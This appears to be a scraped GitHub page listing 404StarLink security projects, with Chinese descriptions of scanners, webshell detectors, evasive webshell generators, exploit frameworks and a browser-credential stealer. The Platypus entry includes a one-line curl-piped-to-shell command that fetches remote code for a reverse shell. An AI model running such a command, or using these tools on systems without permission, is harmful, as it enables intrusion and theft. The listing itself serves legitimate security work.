knownsec / 404starlink Goto Github PK
View Code? Open in Web Editor NEW404StarLink - 推荐优质、有意义、有趣、坚持维护的安全开源项目
404StarLink - 推荐优质、有意义、有趣、坚持维护的安全开源项目
BerylEnigma
一个主要服务于渗透测试过程中的加解密与编解码的小工具包。
[WhetherMysqlSham]
https://github.com/BeichenDream/WhetherMysqlSham
检测目标Mysql数据库是不是蜜罐,获取目标数据库详细信息
在渗透中经常遇到蜜罐 使用此工具可排除被蜜罐捕捉的风险
https://github.com/redtoolskobe/scaninfo
vscode-maudit
https://github.com/m4yfly/vscode-maudit
基于正则的代码审计辅助工具
MDUT - Multiple Database Utilization Tools
https://github.com/SafeGroceryStore/MDUT
MDUT 全称 Multiple Database Utilization Tools,是一款中文的数据库跨平台利用工具,集合了多种主流的数据库类型。基于前人 SQLTOOLS 的基础开发了这套程序(向 SQLTOOLS 致敬),旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂。
工具以 JAVAFx 作为 GUI 操作界面,界面美观。同时程序还支持多数据库同时操作,每种数据库都相互独立。跨平台支持,极大方便了网络安全工作者的使用。
群二维码不展示,能否更新一下
CaA,BurpSuite Collector and Analyzer
https://github.com/gh0stkey/CaA
CaA,全称为Collector and Analyzer,其中文意思就是BurpSuite下的流量收集和分析插件,它的主要作用就是收集流经BurpSuite Proxy模块中的HTTP流量,并从流量中提取一些有价值的信息,它可以帮助你记录这些信息并统计每个信息字段出现的频次,这些信息可以用于接口、参数、目录等相关的枚举工作。
BurpSuite是一款安全从业者常用工具,在测试过程中大量的流量流经BurpSuite,如果这些流量可以得到良好收集和分析、整理,未来将会有一个庞大且具有实战属性的资源,CaA正是发挥了这个作用,将如下信息字段进行收集入库,并且统计频次:
openstar
https://github.com/starjun/openstar
基于openresty 开发的 waf ,规则类 waf
支持复杂规则描述等...
Doge-Assembly
https://github.com/timwhitez/Doge-Assembly
使用Golang execute assembly加载C#程序
C#程序编译为静态资源文件,使用AES加密
clr.dll进程注入的过程采用direct syscall进行api调用
多种免杀方式集合起来,C#好用的红队工具较多。
JspFinder
https://github.com/flowerwind/JspFinder
受4ra1n师傅的JSPKiller项目的启发,开发的一款可实战的,通过污点追踪发现Jsp webshell的工具(A tool to find Jsp Webshell through stain tracking) 。污点跟踪的实现方式为将jsp编译为class后,通过java代码为class中的方法设置污点,然后模拟jvm堆栈的运行,查看污点能否流入危险方法,如:Runtime.exec、ProcessBuilder。这个过程不和web服务器有任何的挂钩和侵入,完全是独立行为,所以该检测方式不会影响服务器,可以在服务器上放心使用。目前可以检测Runtime/ProcessBuilder/冰蝎/哥斯拉/天蝎的webshell。
1、通过逆拓扑排序方法调用链后进行asm分析,可以发现跨越多个嵌套方法调用的恶意webshell
2、asm污点跟踪通过对输入流能否流入恶意方法来判断webshell,相对于只检测恶意方法字串来判断webshell的工具减少了误报
3、可以检测出如天蝎的api_all_jdk_bypass.jsp 等这种通过反射执行defineClass的bypass webshell
4、可以检测出 https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/jsp 的反射变形一句话木马
[AWVS14 Docker]
[https://github.com/XRSec/AWVS14-Docker]
[A new Acunetix Premium update has been released for Windows, Linux, and macOS: 14.4.210816098.
作为一款经典的商业扫描器,深受广大白帽子的欢迎和喜爱
作者只是在方便快捷的同时,做了个更新]
[Docker编译采用了一站式生成,除了原版安装包和激活码,保证无后门,所有编译过程都在Github仓库里面,同时,希望二开的兄弟注明一下作者!]
chrome V8源码分析
https://github.com/v8blink/v8-JavaScript-Documents
本系列文章,讲解V8源码,力求做到全面覆盖知识点、有理论支撑,做到细致讲解源码、有实践依据。3~4天一篇,持续更新中...
本系列文章,从基础入手,对V8内存分配、Isolate创建、handles概念、builtin、codegen、编译等每个方面进行详细讲解。
Stowaway
https://github.com/ph4ntonn/Stowaway
Stowaway旨在构建多级网络,将流量通过多种方式“偷渡”至核心网络
在实际行动过程中,渗透测试者往往会遇到网段不通,无法直接访问核心网络等一系列问题
Stowaway正是为了解决这个问题而写,方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络
同时Stowaway也不仅仅只是一个流量转发工具,其中也嵌入了不少专为渗透测试人员所用的功能,例如端口复用、ssh隧道,流量伪装等等
详情也可查看repo的README~
WEB批量请求器(WebBatchRequest)
https://github.com/ScriptKid-Beta/WebBatchRequest
WEB批量请求器(WebBatchRequest)是对目标地址批量进行快速的存活探测、Title获取,简单的banner识别,支持HTTP代理以及可自定义HTTP请求用于批量的漏洞验证等的一款基于JAVA编写的轻量工具。
对目标地址批量进行快速的存活探测、Title获取,简单的banner识别,支持HTTP代理以及可自定义HTTP请求用于批量的漏洞验证等的一款基于JAVA编写的轻量工具。
黑石碑CTF竞赛平台
https://github.com/thunderbarca/BlackStone
一个基于docker,开箱即用的CTF竞赛平台
简单方便,可一键部署
基于docker,ctf题目可以相互独立
pocassist
https://github.com/jweny/pocassist
文档:https://pocassist.jweny.top/
poc在线测试框架:poc 编写 ----> 靶机验证 ----> 大规模目标扫描 等步骤全在线操作,帮助安全/开发人员只需专注于poc的逻辑实现,避免消耗大量精力开发代码和维护漏洞库。
简单易用:只需要在前端编辑,即可生成poc对靶机 / 批量目标进行测试;单二进制文件,无依赖,也无需安装
性能优秀:支持高并发,通过使用 ants实例化协程池,复用 goroutine,降低GC消耗;多重内存复用,尽可能小的内存占用
规则体系:借鉴了xray的规则体系,但又不仅仅是xray。除了支持目录级漏洞poc,还支持服务器级漏洞、参数级漏洞、url级漏洞、参数级漏洞以及对页面内容检测,对于复杂poc还支持加载自定义的go脚本
Platypus
https://github.com/WangYihang/Platypus
Platypus 是一个基于终端与 Web UI 的反弹 Shell 会话管理工具。
在实际的渗透测试中,为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。
该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能,可以更方便灵活地对反弹 Shell 会话进行管理。
如:
curl http://1.2.3.4:1337|sh
即可一键上线)CodeReviewTools
https://github.com/Ppsoft1991/CodeReviewTools
快速批量反编译特定Jar包中的class名称
search模式可以使用正则搜索文件夹下jar包中的class (场景:知道class名不知道具体位置,想寻找所有Controller接口 等等)
war模式,直接反编译war包,快速投入代码审计的工作
all模式,搜索jar包中符合groupid的class,解压此jar包(场景:很多项目会将自己写的类库编译成jar包,混在一起很难区分反编译。如websphere,想反编译所有关于websphere的jar包,只需要指定目录,设置好websphere的groupid即可)
[Goby-Docker]
[https://github.com/XRSec/Goby-Docker]
[作为一款ATTCK工具,在20年HVV大放光彩,本Docker容器仅仅为了方便快捷,同时支持自动更新,但是需要从Github下载]
[容器采用一站式部署,无人工干预,全部编译过程在Github仓库可见,杜绝后门]
MDAT
https://github.com/SafeGroceryStore/MDAT
由于各种数据库攻击利用工具需要各种环境导致使用相当不便,便萌生了开发此工具的想法,将常用的数据库集合在一起并且优化当时工具的一些不足。
集合了多种主流的数据库类型,跨平台使用,并且持续更新中
BurpCrypto
https://github.com/whwlsfb/BurpCrypto
支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。
Savior
https://github.com/Mustard404/Savior
渗透测试报告自动生成工具!
做过安服的人都知道,输出的渗透测试报告经常出现结果不规范,在报告质量、内容、字体及修复方案中存在诸多问题。因此作者花费一年研发了Savior—渗透测试报告辅助生成系统,帮助渗透测试工程师告别繁琐的渗透测试报告编写过程及漏洞统计过程。主要功能:用户管理、项目管理、修复建议联动、漏洞跟踪、漏洞统计,并支持自定义模板。
ysomap
https://github.com/wh1t3p1g/ysomap
Ysomap is A helpful Java Deserialization exploit framework based on ysoserial
面对如今多样化的目标环境,ysoserial等工具所具备的攻击能力、攻击效果都无法满足实际利用。
ysomap采用了组件化的思路,以多种实现效果装配各类反序列化利用链的生成。
当前,以完成了11种exploits,22种payloads(不包含学习用的gadget),25种bullets。覆盖了cc系列、rmi/ldap/jndi系列、xstream等组件或exp。
f8x
红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等
pwcrack-framework
https://github.com/L-codes/pwcrack-framework
自动破解常见的hash和加解密,目前支持48种算法破解如蓝凌、致远、帆软和navicat等
梼杌
https://github.com/pandasec888/taowu-cobalt-strike
适用于cobalt strike3.x与cobalt strike4.x的插件
高度自动化
DNSlog-GO
https://github.com/lanyi1998/DNSlog-GO
golang版DNSLOG平台
DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。
面向实战的WEB资产采集,支持masscan nmap输出数据,支持waf和cdn检测 后续会加入智能404识别以及敏感路径探测
项目地址:https://github.com/MurkFox/Otter_scan
本项目是基于frida写了一个方便编写frida hook安卓js脚本的框架,frida-skeleton会根据指定的正则表达式持续监听并hook对应的程序,遍历scripts目录下和projects目录下的所有js文件并将它们全部加载用以hook这些程序,项目地址:https://github.com/Margular/frida-skeleton
详细介绍:https://wiki.margular.com/zh/frida-skeleton
用法简介:https://wiki.margular.com/zh/frida-skeleton/usage
[你的项目名]
linglong - 一款甲方资产巡航扫描系统
https://github.com/awake1t/linglong
一款甲方资产巡航扫描系统。系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示
已完成
TODO
MySQL_Fake_Server
https://github.com/fnmsd/MySQL_Fake_Server
用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。
[MysqlT ]
https://github.com/BeichenDream/MysqlT
伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击者
该程序利用了Mysql客户端LoadData的逻辑漏洞
与其它软件不同,本软件支持大文件无损传输
支持用户验证
支持自定义Mysql版本
随机的Salt加密,加上用户验证,让攻击者毫无察觉
CodeInspector
https://github.com/EmYiQing/CodeInspector
一款Java自动代码审计工具,目前是半成品,不过基本的框架已搭建完善,剩下各种WEB漏洞规则的补充
从Java的字节码角度入手,使用ASM技术解析输入Jar包和JDK的所有字节码,模拟JVM的Operand Stack和Local Variables Array
其中重点在于逆拓扑排序所有方法调用关系得到每个方法返回值与入参之间的关系,进而实现数据流分析
最终目标:通过输入一个SpringBoot的Jar,直接生成漏洞报告,得到从可控参数输入点到漏洞的触发点完整信息
JVM在每次方法调用均会创建一个对应的Frame,方法执行完毕或者异常终止,Frame被销毁。而每个Frame的结构如下,主要由本地变量数组(local variables)和操作栈(operand stack)组成。局部变量表所需的容量大小是在编译期确定下来的,表中的变量只在当前方法调用中有效。JVM把操作数栈作为它的工作区——大多数指令都要从这里弹出数据,执行运算,然后把结果压回操作数栈。参考代码中的core/CoreMethodAdapter
,该类构造了Operand Stack和Local Variables Array。在用ASM技术解析class文件的时候,模拟他们在JVM中执行的过程,实现数据流分析
这种自动代码审计的方式,远超过普通正则匹配的准确度,也比AST的方式更加完善
已编写配套的测试项目,打包后可以运行测试效果:https://github.com/EmYiQing/CIDemo
项目正在逐渐完善中
目前做了简单的反射XSS和原生SSRF的检测
具体的原理和实际效果参考项目主页README
JSPHorse
https://github.com/EmYiQing/JSPHorse
一款方便快捷有效的JSP免杀Webshell生成工具
免杀技术包括:
代码生成技术包括:
基于主流先进的JSP免杀技术,采用语法树做代码混淆和生成
简单的命令即可生成免杀和混淆程度较高的Webshell,不仅做到进一步的免杀,更提高了防御方和安全研究人员审计的成本
其中免杀技术第6条用到ASM技术生成随机恶意类,大大简化了一般情况下手动构造JSP Webshell的过程
其中免杀技术第7条直接在Webshell中使用JDK自带的ASM构造恶意字节码,是一种先进的尝试
项目代码层面封装较好,可以很方便地添加新型的免杀方案
fscan
https://github.com/shadow1ng/fscan
一款内网扫描工具,支持存活探测、端口扫描、漏洞扫描、数据库爆破、ms17010检测、网卡信息获取、web指纹扫描+web漏洞扫描(支持xray Poc)等功能
结合信息搜集和漏洞扫描于一体,漏洞扫描类型多、效果好,方便一键大保健
https://github.com/TNK-Studio/lazykube
命令行鼠标交互式的方式去管理 K8s
命令行鼠标交互式的方式去管理 K8s,对比 k9s 命令行工具,可以不用去记那么多快捷键,直接用鼠标交互操作。主要解决公司不使用 rancher 和 dashboard 管理 K8s,只能通过堡垒机访问,这样操作方式只有终端,节约敲命令的时间。
MX1014
https://github.com/L-codes/MX1014
遵循 “短平快” 原则的灵活、轻便和快速端口扫描器
简单灵活的输入UI,在复杂的RCE利用过程中,可以一次执行完成复杂的端口探测任务,如:
./mx1014 192.168.1.0/24:22 192.168.1.133:80-90,443
支持 echo 模式进行探测,可在内网环境探测 ACL 的出网状况
拥有一套自动放弃Filtered状态过多的扫描机制,并如存在closed/open状态的主机会坚持完成端口探测,逻辑上提高扫描效率
Redis-Attack By Replication (通过主从复制攻击Redis)
利用Redis的主从复制功能(>=2.8)、模块功能(>=4)、dll劫持,对Linux下的Redis进行攻击,可执行命令和反弹shell,对Window x64下的Redis攻击,可执行命令。
[你的项目名]
[github项目链接]
[简单介绍一下你的项目]
[聊聊你的项目有什么特点、亮点]
Kernelhub
https://github.com/Ascotbe/Kernelhub
本项目是一个提权相关的集合
每个EXP都有详细说明、演示GIF图、相关分析文章,包括对应的测试机器版本和镜像,减少验证在网络上搜索和验证EXP的时间,减少学习相关漏洞的成本,实战中也可以快速利用获取高权限
后续将会更新Linux相关漏洞
hack-browser-data 是一个解密浏览器数据(密码|历史记录|Cookies|书签)的导出工具,支持全平台主流浏览器的数据导出窃取。
javaSerializationTools
https://github.com/potats0/javaSerializationTools
使用python 读写java反序列化文件
vscan
开源、轻量、快速、跨平台 的红队打点扫描器
功能:端口扫描、指纹识别、poc检测、智能爆破、敏感文件扫描
对IP/IP段或域名表进行快速的指纹识别,并精准识别到易被攻击的系统
1.单独的文件,可以非常方便的在任何系统使用vscan
2.使用成熟开源项目 naabu,httpx 集成,保证扫描稳定性和速度
3.支持 yml和go格式的POC
4.不只是POC检测,vscan会对一些系统登录进行简单爆破,并对系统进行敏感文件扫描
5.智能后台弱口令扫描功能,其他扫描器没想入这个坑,但我觉得有用
6.敏感文件扫描会反补指纹识别(举例:一个应用系统是Tomcat起的,别的扫描器如果只访问首页可能并不能识别出指纹,但是vscan会识别403、404页面或者/manager/html等敏感文件链接从而判断指纹)
HaE
https://github.com/gh0stkey/HaE
HaE是基于 BurpSuite 插件 JavaAPI 开发的请求高亮标记与信息提取的辅助型插件,该插件可以通过自定义正则的方式匹配响应报文或请求报文,可以自行决定符合该自定义正则匹配的相应请求是否需要高亮标记、信息提取。
BurpSuite是一款安全从业者常用工具,大部分的Web安全测试都基于该工具,但流量多而杂的场景下,去做测试不免会浪费很多时间去一个一个的针对性看请求,借助HaE插件可以有效的减少测试的时间,以高亮的方式标记出你所需要的请求或响应,高效的进行漏洞挖掘和测试。
GShark
https://github.com/madneal/gshark
一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。
Glass
https://github.com/s7ckTeam/Glass
Glass旨在帮助红队人员在资产信息收集期间能够快速从C段、大量杂乱的资产中精准识别到易被攻击的系统,从而实施进一步测试攻击。
在红队作战中,信息收集是必不可少的环节,如何才能从大量的资产中提取有用的系统(如OA、VPN、路由、Weblogic...)是众多红队人员头疼的问题。
Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa Api快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。
项目名称:BurpExtend
项目链接:https://github.com/dongfangyuxiao/BurpExtend
项目简介:渗透测试自动化是白帽子和各家公司一直在解决的一个课题,BurpSuit是渗透测试中必不可少的渗透神器,基于BurpSuit插件二次开发,完善丰富其功能,联动各类其他工具达到渗透测试自动化能够有效减少人工的参与和大大提高漏洞检出率。
项目特点、亮点:自动化、多内容、更联动、有效性高
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.